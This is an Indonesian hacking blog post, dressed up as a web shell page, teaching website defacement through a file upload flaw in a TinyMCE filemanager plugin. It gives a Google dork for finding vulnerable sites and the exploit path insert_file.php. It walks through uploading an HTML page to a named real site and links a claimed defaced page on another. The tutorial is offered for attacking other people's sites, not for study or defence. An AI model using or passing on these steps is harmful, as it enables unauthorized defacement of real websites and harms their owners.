UCI
Private Blog
System OS :Linux server.google.com 2.6.32-431.5.1.el6.x86_64 #1 SMP Wed Feb 12 00:41:43 UTC 2014 x86_64
today : | at : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

Deface dengan CMS Webconstructor File Upload Vulnerability Fahmi J rwxr-xr-x 0 09.11

Filename Deface dengan CMS Webconstructor File Upload Vulnerability
Permission rw-r--r--
Author Fahmi J
Date and Time 09.11
Label
Action
Assalamu'alaikum

Kali ini saya akan share teknik deface yang kemarin saya dapat dari bang ENno. Tekniknya cukup mudah terutama bagi yang newbie culun seperti saya. :v

Oke, langsung saja.
Bahan :

  • Google Dork : inurl:tiny_mce/plugins/filemanager [untuk dork lain silahkan dikembangkan sendiri]
  • Exploit : [localhost]/PATH/tiny_mce/plugins/filemanager/insertfile/insert_file.php

Sekarang kita mulai prakteknya.

  1. Buka google dan cari target dengan dork diatas.
  2. Sebagai contoh saya pilih http://rofel.pl/tiny_mce/plugins/filemanager/
  3. masukkan exploitnya sehingga menjadi http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
  4. Upload filenya. Sebagai contoh saya upload file dengan nama suram.html
  5. Jika upload sukses, maka kalian akan melihat alamat filenya di bawah. Yaitu di http://rofel.pl/upload/suram.html
  6. Dan sekarang, foto nabilahJKT48 sudah terpasang di web tersebut. :v
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwoU0tcs02V-Hq15OJvUVbclNsS2m0dYv_TJnwQ9n6xZfUYy3eUBfcZ7gYuyBRXsXP3Hf9a1mD-PDq0Ty0NG1ePkZx7Mjnu9AKya0spQnYx0nq_56GolACy2W_NPBfNu5A6c0nisezoJte/s320/JKT48.png


Ekstensi file yang adpat diupload adalah html, pdf, txt, doc, jpg . Tidak support file .php sehingga tidak bisa upload shell.
CMS Webconstructor File Upload Vulnerability
Thanks to : ENNo Area

Hasil ane http://www.steulaliegites.com/tinymce/jscripts/tiny_mce/plugins/filemanager/files/~cddorg.html

Sumber : Madura Cyber

0 komentar:

Posting Komentar

 

Sh0uT0u7 © 2010 United Cyberspace of Indonesian